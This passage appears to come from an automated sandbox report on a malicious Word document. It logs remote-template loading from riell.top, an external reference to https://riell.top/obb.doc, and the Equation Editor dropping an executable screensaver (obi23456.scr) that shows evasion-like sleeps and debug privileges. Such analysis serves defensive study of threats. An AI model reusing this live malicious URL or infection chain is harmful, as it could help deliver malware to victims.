            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00915DE2 push esi; ret 9_2_00915DE3
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00915DEA push esi; ret 9_2_00915DEB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00908F4B push 50000503h; retf 9_2_00908F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00917162 push esi; ret 9_2_00917163
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EACE5A push ds; retf 11_2_01EACE5C
            Source: obb[1].scr.9.drStatic PE information: section name: .text entropy: 7.37475269907409
            Source: obi23456.scr.9.drStatic PE information: section name: .text entropy: 7.37475269907409

            Persistence and Installation Behavior

            barindex
            Microsoft Office launches external ms-search protocol handler (WebDAV)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\riell.top@SSL\DavWWWRootJump to behavior
            Contains an external reference to another file
            Source: settings.xml.relsExtracted files from sample: https://riell.top/obb.doc
            Drops PE files with a suspicious file extension
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Office drops RTF file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: obb[1].doc.0.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 56784164.doc.0.drJump to dropped file
            Office viewer loads remote template
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 180000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 500000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 750000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrWindow / User API: threadDelayed 537Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrWindow / User API: threadDelayed 9278Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3456Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3520Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3636Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3716Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3716Thread sleep time: -6000000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3744Thread sleep count: 537 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3744Thread sleep count: 9278 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050FCB8 LdrInitializeThunk,11_2_0050FCB8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
